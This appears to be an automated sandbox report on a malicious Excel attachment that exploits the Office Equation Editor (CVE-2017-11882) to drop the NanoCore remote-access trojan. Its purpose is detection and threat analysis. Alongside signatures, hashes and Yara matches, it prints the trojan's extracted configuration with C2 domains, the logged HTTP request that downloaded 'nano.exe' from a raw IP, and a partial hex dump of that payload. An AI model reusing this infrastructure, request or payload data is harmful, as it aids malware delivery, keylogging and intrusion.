Windows Analysis Report F99 SEP-15 Price Inquiry.xlsx

Overview

General Information

Sample Name: F99 SEP-15 Price Inquiry.xlsx
Analysis ID: 483694
MD5: 4128d571ef358c0a3f7f8395f1d0fbfb
SHA1: 47754be43c4494c02c0bf981dd29c1a1e493bcc7
SHA256: a87afbfab3f21c608c233f86f127b31d318132f122f6d08f3065d255dbd1e2fd
Tags: NanoCoreVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "42fc7104-2795-42db-8417-dc7142ab", "Group": "NEW ME", "Domain1": "newmeforever.3utilities.com", "Domain2": "newmeforever12.3utilities.com", "Port": 83, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Multi AV Scanner detection for submitted file
Source: F99 SEP-15 Price Inquiry.xlsx ReversingLabs: Detection: 28%
Antivirus detection for URL or domain
Source: newmeforever.3utilities.com Avira URL Cloud: Label: phishing
Source: newmeforever12.3utilities.com Avira URL Cloud: Label: phishing
Yara detected Nanocore RAT
Source: Yara match File source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR
Antivirus or Machine Learning detection for unpacked file
Source: 9.2.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 9.2.RegSvcs.exe.e30000.11.unpack Avira: Label: TR/NanoCore.fadte

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: ystem.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: bvcs.pdbg source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbPP source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: qC:\Windows\System.pdb source: RegSvcs.exe, 00000009.00000002.693310100.000000000550B000.00000004.00000001.sdmp
Source: Binary string: newmeforever12.3utilities.comsymbols\dll\System.pdbP source: RegSvcs.exe, 00000009.00000002.693310100.000000000550B000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000009.00000002.692562534.00000000048ED000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000009.00000002.692562534.00000000048ED000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp
Source: Binary string: System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: System.pdbX source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: newmeforever.3utilities.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 4x nop then mov esp, ebp 9_2_003BAF30
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 207.246.99.155:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 207.246.99.155:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 69MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: newmeforever.3utilities.com
Source: Malware configuration extractor URLs: newmeforever12.3utilities.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 79.134.225.19 79.134.225.19
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:45:21 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23Last-Modified: Wed, 15 Sep 2021 08:16:45 GMTETag: "ff200-5cc0451ab57c1"Accept-Ranges: bytesContent-Length: 1044992Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed ab 41 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 82 0f 00 00 6e 00 00 00 00 00 00 8a a0 0f 00 00 20 00 00 00 c0 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 a0 0f 00 57 00 00 00 00 e0 0f 00 3c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 80 0f 00 00 20 00 00 00 82 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0f 00 00 02 00 00 00 84 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 3c 6b 00 00 00 e0 0f 00 00 6c 00 00 00 86 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c a0 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 49 0f 00 88 56 00 00 03 00 00 00 48 02 00 06 8c b6 00 00 1c 93 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 06 2a 00 00 13 30 03 00 03 01 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 45 08 00 00 00 02 00 00 00 1d 00 00 00 38 00 00 00 5a 00 00 00 75 00 00 00 97 00 00 00 b2 00 00 00 cd 00 00 00 16 2a 02 15 7d 01 00 00 04 02 20 5d f9 34 53 7d 02 00 00 04 02 17 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 a6 bd 51 f9 7d 02 00 00 04 02 18 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 02 7b 04 00 00 04 20 4b 6d da 95 61 7d 02 00 00 04 02 19 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 2c bc c2 c2 7d 02 00 00 04 02 1a 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 02 7b 04 00 00 04 20 14 10 3d 87 61 7d 02 00 00 04 02 1b 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 94 13 e8 f4 7d 02 00 00 04 02 1c 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 22 47 f5 52 7d 02 00 00 04 02 1d 7d 01 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /covid/nano.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 207.246.99.155Connection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 79.134.225.19:83
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: unknown TCP traffic detected without corresponding DNS query: 207.246.99.155
Source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp String found in binary or memory: http://google.com
Source: vbc.exe, 00000006.00000002.490720765.0000000006050000.00000002.00020000.sdmp, RegSvcs.exe, 00000009.00000002.692717936.0000000004DE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000006.00000002.490720765.0000000006050000.00000002.00020000.sdmp, RegSvcs.exe, 00000009.00000002.692717936.0000000004DE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: CCB31E7E.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBB16E31.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: newmeforever.3utilities.com
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 9_2_003F2B9E WSARecv, 9_2_003F2B9E
Source: global traffic HTTP traffic detected: GET /covid/nano.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 207.246.99.155Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a raw input device (often for capturing keystrokes)
Source: RegSvcs.exe, 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RAT
Source: Yara match File source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 9.2.RegSvcs.exe.d30000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.dd0000.10.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.d40000.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2796198.16.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.da0000.9.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.a00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.da0000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.800000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.a00000.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.dd0000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.740000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2390000.14.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2390000.14.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.740000.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.398b838.20.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.c90000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.398b838.20.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.d40000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.d90000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.d90000.8.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.27a23d8.15.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.4784c9f.21.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.4780000.22.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.6e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.c90000.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.478e8a4.23.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.4780000.22.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.2796198.16.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2796198.16.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.27a23d8.15.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.27a23d8.15.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.2791340.17.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2791340.17.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.692419310.0000000004780000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691355428.0000000002390000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
